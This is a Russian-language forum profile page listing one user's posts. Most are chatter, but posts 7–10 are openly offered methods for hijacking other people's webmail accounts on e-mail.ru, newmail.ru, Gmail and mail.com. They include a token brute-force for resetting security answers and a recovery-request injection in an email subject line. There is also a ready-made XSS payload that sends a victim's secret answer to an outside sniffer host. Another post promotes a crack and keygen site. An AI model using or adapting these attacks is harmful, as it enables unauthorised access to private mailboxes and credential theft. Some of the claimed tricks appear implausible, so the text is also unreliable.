Levon_78

Forumjan
  • Content count

    10
  • Joined

  • Last visited

Community Reputation

0 Neutral

About Levon_78

  • Rank
    Նորեկ Newcomer Новичок
  1. Да точно пора возвращаться к теме. Уже и http://www.genocide.com/ хакнули loooool
  2. Гы... двое запрашивают один и тот же адресс :lol: Лазар джан вы кого хотите взломать ??? Киньте мне адресс я проверю, если будет время.
  3. Смотри на нашем хакерском сайте Армении http://www.cracks.am Там мы собрали много кийгенов и креков для твой программы и вообще практически для всех программ. Думаю что найдёшь всё что тебе нужно. Это самый большой крек-сайт в мире Мы рулим
  4. Возможно ты что неправильно сделал, а возможно что уязвимость уже прикрыли, так как в последний раз я проверял её недели 2 назад. Позже просмотрю и сообщу что к чему.
  5. Парень формат mp3PRO это не просто MP3, а более урезанная версия и весит она почти в 2 раза меньше чем стндартная МР3 Плагин для него платный, по моему стоит около 40 баксов. Это чисто фирменный Нировский плагин и такой формат вряд ли будет проигрываться на твоей магнитоле, хотя на медиа плеере она проигрываеться нормально. Нади в инете программу MP3 Converter, сконвертируй свои файлы в нужный тебе формат и при конвертации в этой программе ты можешь установить в настройках необходимую тебе скорость и частоту.
  6. На днях добавлю ещё уязвимости почтовика WWW.MAIL.RU Надо сначала проверить его. Всем удачи ))
  7. WWW.E-MAIL.RU Метод взлома e-mail.ru несколько не вписывается в общую тематику статьи, но все же - почта. Когда мне потребовалось получить пароль от одного ящика, я как обычно зарегистрировал себе аккаунт и начал исследовать систему. Первое что бросилось в глаза - возможность установить новый пароль и секретный вопрос с ответом, без ввода старого пароля. План действий обычный: проверить фильтрацию тэгов, получить ID и выполнить запрос. Однако для изменения настроек использовалась специальная переменная utoken, которая содержится в теле документа. Поэкспериментировав со сменой вопроса и ответа с заранее известной utoken: http://www.e-mail.ru/scripts/netauth.dll?c...С&panswer=ОТВЕТ я пришел к выводу, что ID и cookies для смены настроек не требуется. При этом, после наблюдения за utoken, обнаружилось что четырехзначное шестнадцатиричное число после адреса почты [email protected] лежит в весьма узком диапазоне. А именно, чтобы установить секретный вопрос с ответом на любом интересующем нас ящике, нужно перебрать всего 7 вариантов: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. Когда число будет угадано, мы попадем в нужный ящик. Примечания: на данный момент произошли некоторые изменения. Служба восстановления паролей не работает, поэтому целесообразно сразу его изменять. Адрес смены настройки тоже изменился: http://www.e-mail.ru/scripts/netauth.dll?c...С&panswer=ОТВЕТ Способ работает невсегда. Вероятно, все-таки требуется, чтобы пользователь время от времени заходил в почту через web.
  8. WWW.NEWMAIL.RU На мой взгляд, довольно популярный почтовик, поэтому расскажу о нём подробно. Тем более, что завладеть чужим аккаунтом на нем намного проще чем кажется с первого взгляда. Можно сделать так: отослать письмо со скриптом, который при запуске получит session id, сформирует нужные запросы, и сменит в настройках значения альтренативного email (на который потом вышлется пароль) и секретного вопроса и ответа. Однако, если при напоминании указать любой другой адрес, пароль вышлется и на него, лишь бы секретный ответ был правильным. И следующее наблюдение: session id для смены настроек можно ВООБЩЕ не использовать. Плюс ко всему, разрешены любые тэги. Все вышеописанное сводит объем кода до пары строк: <iframe src=
  9. WWW.GMAIL.COM Взлом почты на Gmail.com. Всё очень просто. По адресу [email protected] сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами. Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем ) Итак, мы хотим обломать [email protected] Наш ящик [email protected] пароль 123456 Пишем письмо роботу на [email protected] Subject: login=J.Smith&pass=&answer=;login=hacker&pass=123456&answer= В тело письма ничего вставлять не надо, только в Subject. Т.е. первый раз вставляем в тему письма запрос о ящике-жертве: login=J.Smith&pass=&answer= А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные! login=hacker&pass=123456&answer= Итого: тема сообщения выглядит вот так : login=J.Smith&pass=&answer=;login=hacker&pass=123456&answer= Через несколько секунд пароль с адреса [email protected] будет отправлен на вашу почту. (Answer = ответ на секретный вопрос, но прокатывает и без него, запросы разделяются точкой с запятой. Удачи вам.
  10. WWW.MAIL.COM Если воспользоваться службой напоминания пароля, то для его получения достаточно ввести правильный ответ на секретный вопрос (один из вариантов). Значит ставим перед собой задачу получить этот ответ. Делается это легко. Когда я зашел в свойства почтового ящика и просматрел регистрационную информацию, то уидел, что ответ на секретный вопрос не скрывается, что и позволяет нам с помощью JavaScript считать его значение. Внедряем скрипт через тэг <style>. <style>@import url(java script:alert());</style> Адрес страницы с настройками: http://mail01.mail.com/scripts/common/genprofile.cgi Имя формы: profileform Имя поля text с секретным ответом: hint_a В итоге, чтобы украсть секретный вопрос, нужно вызвать страницу настроек, запустить JavaScript, получить значение document.profileform.hint_a.value, и передать его на сниффер вместе с переменной среды окружения REQUEST_URI. Готовый вариант: <style>@import url(java script:document.getElementById('out').innerHTML="<%69%66rame src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value; path='http://zero.h12.ru/stat/capt.php?'; document.zero.location=path+str`></%69%66rame>");</style> <span id='out'></span> В сгенерированном фрейме с именем zero загружается страница настроек. По окончании загрузки, обработчик OnLoad запускает скрипт считывания секретного вопроса, а после, через этот же фрейм отправляет ответ на сниффер. Теперь достаточно зайти по адресу http://zero.h12.ru/stat/log.php, и найти нужную информацию в строке "Host".